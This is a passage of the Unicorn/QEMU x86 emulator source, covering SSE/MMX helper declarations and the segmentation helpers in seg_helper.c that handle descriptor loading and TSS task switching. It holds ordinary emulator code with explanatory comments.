DEF_HELPER_2(cvtss2sq, s64, env, ZMMReg) DEF_HELPER_2(cvtsd2sq, s64, env, ZMMReg) #endif DEF_HELPER_3(cvttps2dq, void, env, ZMMReg, ZMMReg) DEF_HELPER_3(cvttpd2dq, void, env, ZMMReg, ZMMReg) DEF_HELPER_3(cvttps2pi, void, env, MMXReg, ZMMReg) DEF_HELPER_3(cvttpd2pi, void, env, MMXReg, ZMMReg) DEF_HELPER_2(cvttss2si, s32, env, ZMMReg) DEF_HELPER_2(cvttsd2si, s32, env, ZMMReg) #ifdef TARGET_X86_64 DEF_HELPER_2(cvttss2sq, s64, env, ZMMReg) DEF_HELPER_2(cvttsd2sq, s64, env, ZMMReg) #endif DEF_HELPER_3(rsqrtps, void, env, ZMMReg, ZMMReg) DEF_HELPER_3(rsqrtss, void, env, ZMMReg, ZMMReg) DEF_HELPER_3(rcpps, void, env, ZMMReg, ZMMReg) DEF_HELPER_3(rcpss, void, env, ZMMReg, ZMMReg) DEF_HELPER_3(extrq_r, void, env, ZMMReg, ZMMReg) DEF_HELPER_4(extrq_i, void, env, ZMMReg, int, int) DEF_HELPER_3(insertq_r, void, env, ZMMReg, ZMMReg) DEF_HELPER_4(insertq_i, void, env, ZMMReg, int, int) DEF_HELPER_3(haddps, void, env, ZMMReg, ZMMReg) DEF_HELPER_3(haddpd, void, env, ZMMReg, ZMMReg) DEF_HELPER_3(hsubps, void, env, ZMMReg, ZMMReg) DEF_HELPER_3(hsubpd, void, env, ZMMReg, ZMMReg) DEF_HELPER_3(addsubps, void, env, ZMMReg, ZMMReg) DEF_HELPER_3(addsubpd, void, env, ZMMReg, ZMMReg) #define SSE_HELPER_CMP(name, F) \ DEF_HELPER_3(name ## ps, void, env, Reg, Reg) \ DEF_HELPER_3(name ## ss, void, env, Reg, Reg) \ DEF_HELPER_3(name ## pd, void, env, Reg, Reg) \ DEF_HELPER_3(name ## sd, void, env, Reg, Reg) SSE_HELPER_CMP(cmpeq, FPU_CMPEQ) SSE_HELPER_CMP(cmplt, FPU_CMPLT) SSE_HELPER_CMP(cmple, FPU_CMPLE) SSE_HELPER_CMP(cmpunord, FPU_CMPUNORD) SSE_HELPER_CMP(cmpneq, FPU_CMPNEQ) SSE_HELPER_CMP(cmpnlt, FPU_CMPNLT) SSE_HELPER_CMP(cmpnle, FPU_CMPNLE) SSE_HELPER_CMP(cmpord, FPU_CMPORD) DEF_HELPER_3(ucomiss, void, env, Reg, Reg) DEF_HELPER_3(comiss, void, env, Reg, Reg) DEF_HELPER_3(ucomisd, void, env, Reg, Reg) DEF_HELPER_3(comisd, void, env, Reg, Reg) DEF_HELPER_2(movmskps, i32, env, Reg) DEF_HELPER_2(movmskpd, i32, env, Reg) #endif DEF_HELPER_2(glue(pmovmskb, SUFFIX), i32, env, Reg) DEF_HELPER_3(glue(packsswb, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(packuswb, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(packssdw, SUFFIX), 
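/* Naming convention used throughout this header: a trailing "ps"/"pd"
 * means packed single/double precision and "ss"/"sd" the scalar
 * forms, so each SSE_HELPER_S()/SSE_HELPER_CMP() above fans out into
 * four helpers; a double-t conversion (cvttss2si etc.) truncates
 * instead of honouring the current rounding mode. */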
void, env, Reg, Reg) #define UNPCK_OP(base_name, base) \ DEF_HELPER_3(glue(punpck ## base_name ## bw, SUFFIX), void, env, Reg, Reg) \ DEF_HELPER_3(glue(punpck ## base_name ## wd, SUFFIX), void, env, Reg, Reg) \ DEF_HELPER_3(glue(punpck ## base_name ## dq, SUFFIX), void, env, Reg, Reg) UNPCK_OP(l, 0) UNPCK_OP(h, 1) #if SHIFT == 1 DEF_HELPER_3(glue(punpcklqdq, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(punpckhqdq, SUFFIX), void, env, Reg, Reg) #endif /* 3DNow! float ops */ #if SHIFT == 0 DEF_HELPER_3(pi2fd, void, env, MMXReg, MMXReg) DEF_HELPER_3(pi2fw, void, env, MMXReg, MMXReg) DEF_HELPER_3(pf2id, void, env, MMXReg, MMXReg) DEF_HELPER_3(pf2iw, void, env, MMXReg, MMXReg) DEF_HELPER_3(pfacc, void, env, MMXReg, MMXReg) DEF_HELPER_3(pfadd, void, env, MMXReg, MMXReg) DEF_HELPER_3(pfcmpeq, void, env, MMXReg, MMXReg) DEF_HELPER_3(pfcmpge, void, env, MMXReg, MMXReg) DEF_HELPER_3(pfcmpgt, void, env, MMXReg, MMXReg) DEF_HELPER_3(pfmax, void, env, MMXReg, MMXReg) DEF_HELPER_3(pfmin, void, env, MMXReg, MMXReg) DEF_HELPER_3(pfmul, void, env, MMXReg, MMXReg) DEF_HELPER_3(pfnacc, void, env, MMXReg, MMXReg) DEF_HELPER_3(pfpnacc, void, env, MMXReg, MMXReg) DEF_HELPER_3(pfrcp, void, env, MMXReg, MMXReg) DEF_HELPER_3(pfrsqrt, void, env, MMXReg, MMXReg) DEF_HELPER_3(pfsub, void, env, MMXReg, MMXReg) DEF_HELPER_3(pfsubr, void, env, MMXReg, MMXReg) DEF_HELPER_3(pswapd, void, env, MMXReg, MMXReg) #endif /* SSSE3 op helpers */ DEF_HELPER_3(glue(phaddw, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(phaddd, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(phaddsw, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(phsubw, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(phsubd, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(phsubsw, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(pabsb, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(pabsw, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(pabsd, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(pmaddubsw, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(pmulhrsw, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(pshufb, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(psignb, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(psignw, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(psignd, SUFFIX), void, env, Reg, Reg) DEF_HELPER_4(glue(palignr, SUFFIX), void, env, Reg, Reg, s32) /* SSE4.1 op helpers */ #if SHIFT == 1 DEF_HELPER_3(glue(pblendvb, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(blendvps, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(blendvpd, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(ptest, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(pmovsxbw, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(pmovsxbd, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(pmovsxbq, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(pmovsxwd, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(pmovsxwq, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(pmovsxdq, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(pmovzxbw, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(pmovzxbd, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(pmovzxbq, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(pmovzxwd, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(pmovzxwq, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(pmovzxdq, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(pmuldq, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(pcmpeqq, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(packusdw, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(pminsb, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(pminsd, 
SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(pminuw, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(pminud, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(pmaxsb, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(pmaxsd, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(pmaxuw, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(pmaxud, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(pmulld, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(phminposuw, SUFFIX), void, env, Reg, Reg) DEF_HELPER_4(glue(roundps, SUFFIX), void, env, Reg, Reg, i32) DEF_HELPER_4(glue(roundpd, SUFFIX), void, env, Reg, Reg, i32) DEF_HELPER_4(glue(roundss, SUFFIX), void, env, Reg, Reg, i32) DEF_HELPER_4(glue(roundsd, SUFFIX), void, env, Reg, Reg, i32) DEF_HELPER_4(glue(blendps, SUFFIX), void, env, Reg, Reg, i32) DEF_HELPER_4(glue(blendpd, SUFFIX), void, env, Reg, Reg, i32) DEF_HELPER_4(glue(pblendw, SUFFIX), void, env, Reg, Reg, i32) DEF_HELPER_4(glue(dpps, SUFFIX), void, env, Reg, Reg, i32) DEF_HELPER_4(glue(dppd, SUFFIX), void, env, Reg, Reg, i32) DEF_HELPER_4(glue(mpsadbw, SUFFIX), void, env, Reg, Reg, i32) #endif /* SSE4.2 op helpers */ #if SHIFT == 1 DEF_HELPER_3(glue(pcmpgtq, SUFFIX), void, env, Reg, Reg) DEF_HELPER_4(glue(pcmpestri, SUFFIX), void, env, Reg, Reg, i32) DEF_HELPER_4(glue(pcmpestrm, SUFFIX), void, env, Reg, Reg, i32) DEF_HELPER_4(glue(pcmpistri, SUFFIX), void, env, Reg, Reg, i32) DEF_HELPER_4(glue(pcmpistrm, SUFFIX), void, env, Reg, Reg, i32) DEF_HELPER_3(crc32, tl, i32, tl, i32) #endif /* AES-NI op helpers */ #if SHIFT == 1 DEF_HELPER_3(glue(aesdec, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(aesdeclast, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(aesenc, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(aesenclast, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(aesimc, SUFFIX), void, env, Reg, Reg) DEF_HELPER_4(glue(aeskeygenassist, SUFFIX), void, env, Reg, Reg, i32) DEF_HELPER_4(glue(pclmulqdq, SUFFIX), void, env, Reg, Reg, i32) #endif #undef SHIFT #undef Reg #undef SUFFIX #undef SSE_HELPER_B #undef SSE_HELPER_W #undef SSE_HELPER_L #undef SSE_HELPER_Q #undef SSE_HELPER_S #undef SSE_HELPER_CMP #undef UNPCK_OP
unicorn-2.1.1/qemu/target/i386/seg_helper.c
/* * x86 segmentation related helpers: * TSS, interrupts, system calls, jumps and call/task gates, descriptors * * Copyright (c) 2003 Fabrice Bellard * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>.
*/ #include "qemu/osdep.h" #include "cpu.h" #include "qemu/log.h" #include "exec/helper-proto.h" #include "exec/exec-all.h" #include "exec/cpu_ldst.h" #include "uc_priv.h" #include <unicorn/unicorn.h> //#define DEBUG_PCALL #ifdef DEBUG_PCALL # define LOG_PCALL(...) qemu_log_mask(CPU_LOG_PCALL, ## __VA_ARGS__) # define LOG_PCALL_STATE(cpu) \ log_cpu_state_mask(CPU_LOG_PCALL, (cpu), CPU_DUMP_CCOP) #else # define LOG_PCALL(...) do { } while (0) # define LOG_PCALL_STATE(cpu) do { } while (0) #endif /* * TODO: Convert callers to compute cpu_mmu_index_kernel once * and use *_mmuidx_ra directly. */ #define cpu_ldub_kernel_ra(e, p, r) \ cpu_ldub_mmuidx_ra(e, p, cpu_mmu_index_kernel(e), r) #define cpu_lduw_kernel_ra(e, p, r) \ cpu_lduw_mmuidx_ra(e, p, cpu_mmu_index_kernel(e), r) #define cpu_ldl_kernel_ra(e, p, r) \ cpu_ldl_mmuidx_ra(e, p, cpu_mmu_index_kernel(e), r) #define cpu_ldq_kernel_ra(e, p, r) \ cpu_ldq_mmuidx_ra(e, p, cpu_mmu_index_kernel(e), r) #define cpu_stb_kernel_ra(e, p, v, r) \ cpu_stb_mmuidx_ra(e, p, v, cpu_mmu_index_kernel(e), r) #define cpu_stw_kernel_ra(e, p, v, r) \ cpu_stw_mmuidx_ra(e, p, v, cpu_mmu_index_kernel(e), r) #define cpu_stl_kernel_ra(e, p, v, r) \ cpu_stl_mmuidx_ra(e, p, v, cpu_mmu_index_kernel(e), r) #define cpu_stq_kernel_ra(e, p, v, r) \ cpu_stq_mmuidx_ra(e, p, v, cpu_mmu_index_kernel(e), r) #define cpu_ldub_kernel(e, p) cpu_ldub_kernel_ra(e, p, 0) #define cpu_lduw_kernel(e, p) cpu_lduw_kernel_ra(e, p, 0) #define cpu_ldl_kernel(e, p) cpu_ldl_kernel_ra(e, p, 0) #define cpu_ldq_kernel(e, p) cpu_ldq_kernel_ra(e, p, 0) #define cpu_stb_kernel(e, p, v) cpu_stb_kernel_ra(e, p, v, 0) #define cpu_stw_kernel(e, p, v) cpu_stw_kernel_ra(e, p, v, 0) #define cpu_stl_kernel(e, p, v) cpu_stl_kernel_ra(e, p, v, 0) #define cpu_stq_kernel(e, p, v) cpu_stq_kernel_ra(e, p, v, 0) /* return non zero if error */ static inline int load_segment_ra(CPUX86State *env, uint32_t *e1_ptr, uint32_t *e2_ptr, int selector, uintptr_t retaddr) { SegmentCache *dt; int index; target_ulong ptr; if (selector & 0x4) { dt = &env->ldt; } else { dt = &env->gdt; } index = selector & ~7; if ((index + 7) > dt->limit) { return -1; } ptr = dt->base + index; *e1_ptr = cpu_ldl_kernel_ra(env, ptr, retaddr); *e2_ptr = cpu_ldl_kernel_ra(env, ptr + 4, retaddr); return 0; } static inline int load_segment(CPUX86State *env, uint32_t *e1_ptr, uint32_t *e2_ptr, int selector) { return load_segment_ra(env, e1_ptr, e2_ptr, selector, 0); } static inline unsigned int get_seg_limit(uint32_t e1, uint32_t e2) { unsigned int limit; limit = (e1 & 0xffff) | (e2 & 0x000f0000); if (e2 & DESC_G_MASK) { limit = (limit << 12) | 0xfff; } return limit; } static inline uint32_t get_seg_base(uint32_t e1, uint32_t e2) { return (e1 >> 16) | ((e2 & 0xff) << 16) | (e2 & 0xff000000); } static inline void load_seg_cache_raw_dt(SegmentCache *sc, uint32_t e1, uint32_t e2) { sc->base = get_seg_base(e1, e2); sc->limit = get_seg_limit(e1, e2); sc->flags = e2; } /* init the segment cache in vm86 mode. 
*/ static inline void load_seg_vm(CPUX86State *env, int seg, int selector) { selector &= 0xffff; cpu_x86_load_seg_cache(env, seg, selector, (selector << 4), 0xffff, DESC_P_MASK | DESC_S_MASK | DESC_W_MASK | DESC_A_MASK | (3 << DESC_DPL_SHIFT)); } static inline void get_ss_esp_from_tss(CPUX86State *env, uint32_t *ss_ptr, uint32_t *esp_ptr, int dpl, uintptr_t retaddr) { X86CPU *cpu = env_archcpu(env); int type, index, shift; #if 0 { int i; printf("TR: base=%p limit=%x\n", env->tr.base, env->tr.limit); for (i = 0; i < env->tr.limit; i++) { printf("%02x ", env->tr.base[i]); if ((i & 7) == 7) { printf("\n"); } } printf("\n"); } #endif if (!(env->tr.flags & DESC_P_MASK)) { cpu_abort(CPU(cpu), "invalid tss"); } type = (env->tr.flags >> DESC_TYPE_SHIFT) & 0xf; if ((type & 7) != 1) { cpu_abort(CPU(cpu), "invalid tss type"); } shift = type >> 3; index = (dpl * 4 + 2) << shift; if (index + (4 << shift) - 1 > env->tr.limit) { raise_exception_err_ra(env, EXCP0A_TSS, env->tr.selector & 0xfffc, retaddr); } if (shift == 0) { *esp_ptr = cpu_lduw_kernel_ra(env, env->tr.base + index, retaddr); *ss_ptr = cpu_lduw_kernel_ra(env, env->tr.base + index + 2, retaddr); } else { *esp_ptr = cpu_ldl_kernel_ra(env, env->tr.base + index, retaddr); *ss_ptr = cpu_lduw_kernel_ra(env, env->tr.base + index + 4, retaddr); } } static void tss_load_seg(CPUX86State *env, int seg_reg, int selector, int cpl, uintptr_t retaddr) { uint32_t e1, e2; int rpl, dpl; if ((selector & 0xfffc) != 0) { if (load_segment_ra(env, &e1, &e2, selector, retaddr) != 0) { raise_exception_err_ra(env, EXCP0A_TSS, selector & 0xfffc, retaddr); } if (!(e2 & DESC_S_MASK)) { raise_exception_err_ra(env, EXCP0A_TSS, selector & 0xfffc, retaddr); } rpl = selector & 3; dpl = (e2 >> DESC_DPL_SHIFT) & 3; if (seg_reg == R_CS) { if (!(e2 & DESC_CS_MASK)) { raise_exception_err_ra(env, EXCP0A_TSS, selector & 0xfffc, retaddr); } if (dpl != rpl) { raise_exception_err_ra(env, EXCP0A_TSS, selector & 0xfffc, retaddr); } } else if (seg_reg == R_SS) { /* SS must be writable data */ if ((e2 & DESC_CS_MASK) || !(e2 & DESC_W_MASK)) { raise_exception_err_ra(env, EXCP0A_TSS, selector & 0xfffc, retaddr); } if (dpl != cpl || dpl != rpl) { raise_exception_err_ra(env, EXCP0A_TSS, selector & 0xfffc, retaddr); } } else { /* not readable code */ if ((e2 & DESC_CS_MASK) && !(e2 & DESC_R_MASK)) { raise_exception_err_ra(env, EXCP0A_TSS, selector & 0xfffc, retaddr); } /* if data or non conforming code, checks the rights */ if (((e2 >> DESC_TYPE_SHIFT) & 0xf) < 12) { if (dpl < cpl || dpl < rpl) { raise_exception_err_ra(env, EXCP0A_TSS, selector & 0xfffc, retaddr); } } } if (!(e2 & DESC_P_MASK)) { raise_exception_err_ra(env, EXCP0B_NOSEG, selector & 0xfffc, retaddr); } cpu_x86_load_seg_cache(env, seg_reg, selector, get_seg_base(e1, e2), get_seg_limit(e1, e2), e2); } else { if (seg_reg == R_SS || seg_reg == R_CS) { raise_exception_err_ra(env, EXCP0A_TSS, selector & 0xfffc, retaddr); } } } #define SWITCH_TSS_JMP 0 #define SWITCH_TSS_IRET 1 #define SWITCH_TSS_CALL 2 /* XXX: restore CPU state in registers (PowerPC case) */ static void switch_tss_ra(CPUX86State *env, int tss_selector, uint32_t e1, uint32_t e2, int source, uint32_t next_eip, uintptr_t retaddr) { int tss_limit, tss_limit_max, type, old_tss_limit_max, old_type, v1, v2, i; target_ulong tss_base; uint32_t new_regs[8], new_segs[6]; uint32_t new_eflags, new_eip, new_cr3, new_ldt, new_trap; uint32_t old_eflags, eflags_mask; SegmentCache *dt; int index; target_ulong ptr; type = (e2 >> DESC_TYPE_SHIFT) & 0xf; LOG_PCALL("switch_tss: 
sel=0x%04x type=%d src=%d\n", tss_selector, type, source); /* if task gate, we read the TSS segment and we load it */ if (type == 5) { if (!(e2 & DESC_P_MASK)) { raise_exception_err_ra(env, EXCP0B_NOSEG, tss_selector & 0xfffc, retaddr); } tss_selector = e1 >> 16; if (tss_selector & 4) { raise_exception_err_ra(env, EXCP0A_TSS, tss_selector & 0xfffc, retaddr); } if (load_segment_ra(env, &e1, &e2, tss_selector, retaddr) != 0) { raise_exception_err_ra(env, EXCP0D_GPF, tss_selector & 0xfffc, retaddr); } if (e2 & DESC_S_MASK) { raise_exception_err_ra(env, EXCP0D_GPF, tss_selector & 0xfffc, retaddr); } type = (e2 >> DESC_TYPE_SHIFT) & 0xf; if ((type & 7) != 1) { raise_exception_err_ra(env, EXCP0D_GPF, tss_selector & 0xfffc, retaddr); } } if (!(e2 & DESC_P_MASK)) { raise_exception_err_ra(env, EXCP0B_NOSEG, tss_selector & 0xfffc, retaddr); } if (type & 8) { tss_limit_max = 103; } else { tss_limit_max = 43; } tss_limit = get_seg_limit(e1, e2); tss_base = get_seg_base(e1, e2); if ((tss_selector & 4) != 0 || tss_limit < tss_limit_max) { raise_exception_err_ra(env, EXCP0A_TSS, tss_selector & 0xfffc, retaddr); } old_type = (env->tr.flags >> DESC_TYPE_SHIFT) & 0xf; if (old_type & 8) { old_tss_limit_max = 103; } else { old_tss_limit_max = 43; } /* read all the registers from the new TSS */ if (type & 8) { /* 32 bit */ new_cr3 = cpu_ldl_kernel_ra(env, tss_base + 0x1c, retaddr); new_eip = cpu_ldl_kernel_ra(env, tss_base + 0x20, retaddr); new_eflags = cpu_ldl_kernel_ra(env, tss_base + 0x24, retaddr); for (i = 0; i < 8; i++) { new_regs[i] = cpu_ldl_kernel_ra(env, tss_base + (0x28 + i * 4), retaddr); } for (i = 0; i < 6; i++) { new_segs[i] = cpu_lduw_kernel_ra(env, tss_base + (0x48 + i * 4), retaddr); } new_ldt = cpu_lduw_kernel_ra(env, tss_base + 0x60, retaddr); new_trap = cpu_ldl_kernel_ra(env, tss_base + 0x64, retaddr); } else { /* 16 bit */ new_cr3 = 0; new_eip = cpu_lduw_kernel_ra(env, tss_base + 0x0e, retaddr); new_eflags = cpu_lduw_kernel_ra(env, tss_base + 0x10, retaddr); for (i = 0; i < 8; i++) { new_regs[i] = cpu_lduw_kernel_ra(env, tss_base + (0x12 + i * 2), retaddr) | 0xffff0000; } for (i = 0; i < 4; i++) { new_segs[i] = cpu_lduw_kernel_ra(env, tss_base + (0x22 + i * 4), retaddr); } new_ldt = cpu_lduw_kernel_ra(env, tss_base + 0x2a, retaddr); new_segs[R_FS] = 0; new_segs[R_GS] = 0; new_trap = 0; } /* XXX: avoid a compiler warning, see http://support.amd.com/us/Processor_TechDocs/24593.pdf chapters 12.2.5 and 13.2.4 on how to implement TSS Trap bit */ (void)new_trap; /* NOTE: we must avoid memory exceptions during the task switch, so we make dummy accesses before */ /* XXX: it can still fail in some cases, so a bigger hack is necessary to valid the TLB after having done the accesses */ v1 = cpu_ldub_kernel_ra(env, env->tr.base, retaddr); v2 = cpu_ldub_kernel_ra(env, env->tr.base + old_tss_limit_max, retaddr); cpu_stb_kernel_ra(env, env->tr.base, v1, retaddr); cpu_stb_kernel_ra(env, env->tr.base + old_tss_limit_max, v2, retaddr); /* clear busy bit (it is restartable) */ if (source == SWITCH_TSS_JMP || source == SWITCH_TSS_IRET) { target_ulong ptr; uint32_t e2; ptr = env->gdt.base + (env->tr.selector & ~7); e2 = cpu_ldl_kernel_ra(env, ptr + 4, retaddr); e2 &= ~DESC_TSS_BUSY_MASK; cpu_stl_kernel_ra(env, ptr + 4, e2, retaddr); } old_eflags = cpu_compute_eflags(env); if (source == SWITCH_TSS_IRET) { old_eflags &= ~NT_MASK; } /* save the current state in the old TSS */ if (type & 8) { /* 32 bit */ cpu_stl_kernel_ra(env, env->tr.base + 0x20, next_eip, retaddr); cpu_stl_kernel_ra(env, env->tr.base + 0x24, 
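/* 32-bit TSS layout used by both the read path above and this save
 * path: +0x1c CR3, +0x20 EIP, +0x24 EFLAGS, +0x28 the eight GP
 * registers (4 bytes each, EAX..EDI), +0x48 the six segment
 * selectors at a 4-byte stride, +0x60 the LDT selector, +0x64 the
 * T bit and I/O map base. */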
old_eflags, retaddr); cpu_stl_kernel_ra(env, env->tr.base + (0x28 + 0 * 4), env->regs[R_EAX], retaddr); cpu_stl_kernel_ra(env, env->tr.base + (0x28 + 1 * 4), env->regs[R_ECX], retaddr); cpu_stl_kernel_ra(env, env->tr.base + (0x28 + 2 * 4), env->regs[R_EDX], retaddr); cpu_stl_kernel_ra(env, env->tr.base + (0x28 + 3 * 4), env->regs[R_EBX], retaddr); cpu_stl_kernel_ra(env, env->tr.base + (0x28 + 4 * 4), env->regs[R_ESP], retaddr); cpu_stl_kernel_ra(env, env->tr.base + (0x28 + 5 * 4), env->regs[R_EBP], retaddr); cpu_stl_kernel_ra(env, env->tr.base + (0x28 + 6 * 4), env->regs[R_ESI], retaddr); cpu_stl_kernel_ra(env, env->tr.base + (0x28 + 7 * 4), env->regs[R_EDI], retaddr); for (i = 0; i < 6; i++) { cpu_stw_kernel_ra(env, env->tr.base + (0x48 + i * 4), env->segs[i].selector, retaddr); } } else { /* 16 bit */ cpu_stw_kernel_ra(env, env->tr.base + 0x0e, next_eip, retaddr); cpu_stw_kernel_ra(env, env->tr.base + 0x10, old_eflags, retaddr); cpu_stw_kernel_ra(env, env->tr.base + (0x12 + 0 * 2), env->regs[R_EAX], retaddr); cpu_stw_kernel_ra(env, env->tr.base + (0x12 + 1 * 2), env->regs[R_ECX], retaddr); cpu_stw_kernel_ra(env, env->tr.base + (0x12 + 2 * 2), env->regs[R_EDX], retaddr); cpu_stw_kernel_ra(env, env->tr.base + (0x12 + 3 * 2), env->regs[R_EBX], retaddr); cpu_stw_kernel_ra(env, env->tr.base + (0x12 + 4 * 2), env->regs[R_ESP], retaddr); cpu_stw_kernel_ra(env, env->tr.base + (0x12 + 5 * 2), env->regs[R_EBP], retaddr); cpu_stw_kernel_ra(env, env->tr.base + (0x12 + 6 * 2), env->regs[R_ESI], retaddr); cpu_stw_kernel_ra(env, env->tr.base + (0x12 + 7 * 2), env->regs[R_EDI], retaddr); for (i = 0; i < 4; i++) { cpu_stw_kernel_ra(env, env->tr.base + (0x22 + i * 4), env->segs[i].selector, retaddr); } } /* now if an exception occurs, it will occurs in the next task context */ if (source == SWITCH_TSS_CALL) { cpu_stw_kernel_ra(env, tss_base, env->tr.selector, retaddr); new_eflags |= NT_MASK; } /* set busy bit */ if (source == SWITCH_TSS_JMP || source == SWITCH_TSS_CALL) { target_ulong ptr; uint32_t e2; ptr = env->gdt.base + (tss_selector & ~7); e2 = cpu_ldl_kernel_ra(env, ptr + 4, retaddr); e2 |= DESC_TSS_BUSY_MASK; cpu_stl_kernel_ra(env, ptr + 4, e2, retaddr); } /* set the new CPU state */ /* from this point, any exception which occurs can give problems */ env->cr[0] |= CR0_TS_MASK; env->hflags |= HF_TS_MASK; env->tr.selector = tss_selector; env->tr.base = tss_base; env->tr.limit = tss_limit; env->tr.flags = e2 & ~DESC_TSS_BUSY_MASK; if ((type & 8) && (env->cr[0] & CR0_PG_MASK)) { cpu_x86_update_cr3(env, new_cr3); } /* load all registers without an exception, then reload them with possible exception */ env->eip = new_eip; eflags_mask = TF_MASK | AC_MASK | ID_MASK | IF_MASK | IOPL_MASK | VM_MASK | RF_MASK | NT_MASK; if (!(type & 8)) { eflags_mask &= 0xffff; } cpu_load_eflags(env, new_eflags, eflags_mask); /* XXX: what to do in 16 bit case? 
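(A 16-bit TSS only holds the low word of each register; the read
path above already filled the upper halves with 0xffff0000, so the
assignments below work for both formats.)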
*/ env->regs[R_EAX] = new_regs[0]; env->regs[R_ECX] = new_regs[1]; env->regs[R_EDX] = new_regs[2]; env->regs[R_EBX] = new_regs[3]; env->regs[R_ESP] = new_regs[4]; env->regs[R_EBP] = new_regs[5]; env->regs[R_ESI] = new_regs[6]; env->regs[R_EDI] = new_regs[7]; if (new_eflags & VM_MASK) { for (i = 0; i < 6; i++) { load_seg_vm(env, i, new_segs[i]); } } else { /* first just selectors as the rest may trigger exceptions */ for (i = 0; i < 6; i++) { cpu_x86_load_seg_cache(env, i, new_segs[i], 0, 0, 0); } } env->ldt.selector = new_ldt & ~4; env->ldt.base = 0; env->ldt.limit = 0; env->ldt.flags = 0; /* load the LDT */ if (new_ldt & 4) { raise_exception_err_ra(env, EXCP0A_TSS, new_ldt & 0xfffc, retaddr); } if ((new_ldt & 0xfffc) != 0) { dt = &env->gdt; index = new_ldt & ~7; if ((index + 7) > dt->limit) { raise_exception_err_ra(env, EXCP0A_TSS, new_ldt & 0xfffc, retaddr); } ptr = dt->base + index; e1 = cpu_ldl_kernel_ra(env, ptr, retaddr); e2 = cpu_ldl_kernel_ra(env, ptr + 4, retaddr); if ((e2 & DESC_S_MASK) || ((e2 >> DESC_TYPE_SHIFT) & 0xf) != 2) { raise_exception_err_ra(env, EXCP0A_TSS, new_ldt & 0xfffc, retaddr); } if (!(e2 & DESC_P_MASK)) { raise_exception_err_ra(env, EXCP0A_TSS, new_ldt & 0xfffc, retaddr); } load_seg_cache_raw_dt(&env->ldt, e1, e2); } /* load the segments */ if (!(new_eflags & VM_MASK)) { int cpl = new_segs[R_CS] & 3; tss_load_seg(env, R_CS, new_segs[R_CS], cpl, retaddr); tss_load_seg(env, R_SS, new_segs[R_SS], cpl, retaddr); tss_load_seg(env, R_ES, new_segs[R_ES], cpl, retaddr); tss_load_seg(env, R_DS, new_segs[R_DS], cpl, retaddr); tss_load_seg(env, R_FS, new_segs[R_FS], cpl, retaddr); tss_load_seg(env, R_GS, new_segs[R_GS], cpl, retaddr); } /* check that env->eip is in the CS segment limits */ if (new_eip > env->segs[R_CS].limit) { /* XXX: different exception if CALL? */ raise_exception_err_ra(env, EXCP0D_GPF, 0, retaddr); } /* reset local breakpoints */ if (env->dr[7] & DR7_LOCAL_BP_MASK) { cpu_x86_update_dr7(env, env->dr[7] & ~DR7_LOCAL_BP_MASK); } } static void switch_tss(CPUX86State *env, int tss_selector, uint32_t e1, uint32_t e2, int source, uint32_t next_eip) { switch_tss_ra(env, tss_selector, e1, e2, source, next_eip, 0); } static inline unsigned int get_sp_mask(unsigned int e2) { #ifdef TARGET_X86_64 if (e2 & DESC_L_MASK) { return 0; } else #endif if (e2 & DESC_B_MASK) { return 0xffffffff; } else { return 0xffff; } } static int exception_has_error_code(int intno) { switch (intno) { case 8: case 10: case 11: case 12: case 13: case 14: case 17: return 